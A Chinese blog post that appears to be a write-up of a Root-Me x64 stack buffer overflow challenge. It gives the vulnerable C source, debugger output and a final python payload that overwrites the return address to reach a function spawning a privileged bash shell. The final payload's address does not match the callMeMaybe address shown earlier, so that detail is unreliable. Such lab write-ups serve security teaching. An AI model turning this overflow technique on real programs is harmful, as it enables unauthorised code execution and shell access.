Stack buffer overflow - basic

发表于 分类于 阅读次数: Valine:
本文字数: 3.3k 阅读时长 ≈ 3 分钟

ELF x64 - Stack buffer overflow - basic

gdb 内 查看函数

info functions

0x0000000000401152  callMeMaybe
0x0000000000401193  main

ret 后
会将rsp指向的内容压入RIP,转移程序执行流

题目源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
 
/*
gcc -o ch35 ch35.c -fno-stack-protector -no-pie -Wl,-z,relro,-z,now,-z,noexecstack
*/
 
void callMeMaybe(){
    char *argv[] = { "/bin/bash", "-p", NULL };
    execve(argv[0], argv, NULL);
}
 
int main(int argc, char **argv){
 
    char buffer[256];
    int len, i;
 
    scanf("%s", buffer);
    len = strlen(buffer);
 
    printf("Hello %s\n", buffer);
 
    return 0;
}

主要思路:

http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%2064%20Bits%20Linux%20Stack%20Based%20Buffer%20Overflow.pdf
根据这篇文章
通过溢出来控制RIP,将其指向我们想要的函数

  1. 先向buffer中输入字符,执行到ret时,查看RSP的值,确定需要多少位可以溢出到RSP
  2. 可以确定需要0x110280位,之后添加的字符就会输入进RIP
  3. 我们需要的是执行callMeMaybe(),所以将函数地址倒序添加进末尾(因为小端序)

查看函数地址

[0x00401193]> fs symbols;f
0x00401000 23 sym._init
0x00401070 42 entry0
0x00401070 43 sym._start
0x004010a0 1 sym._dl_relocate_static_pie
0x004010b0 33 sym.deregister_tm_clones
0x004010e0 49 sym.register_tm_clones
0x00401120 33 entry.fini0
0x00401120 0 sym.__do_global_dtors_aux
0x00401150 2 entry.init0
0x00401150 0 sym.frame_dummy
0x00401152 65 sym.callMeMaybe
0x00401193 103 main
0x00401193 103 sym.main

“a”*280+”B”*6

gdb-peda$ x/290xb $rbp-0x110
0x7fffffffdb80:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdb88:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdb90:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdb98:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdba0:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdba8:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbb0:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbb8:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbc0:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbc8:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbd0:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbd8:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbe0:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbe8:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbf0:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdbf8:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc00:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc08:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc10:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc18:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc20:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc28:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc30:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc38:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc40:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc48:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc50:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc58:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc60:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc68:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc70:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc78:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc80:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc88:    0x61    0x61    0x61    0x61    0x1e    0x01    0x00    0x00
0x7fffffffdc90:    0x61    0x61    0x61    0x61    0x61    0x61    0x61    0x61
0x7fffffffdc98:    0x42    0x42    0x42    0x42    0x42    0x42    0x00    0x00
0x7fffffffdca0:    0x88    0xdd

成功控制RIP
RSP: 0x7fffffffdc98 –> 0x424242424242 (‘BBBBBB’)
Invalid $PC address: 0x424242424242

最后的payload:
(python -c 'print "A" * 280 + "\xe7\x05\x40\x00\x00\x00\x00\x00"' ; cat ) | ./ch35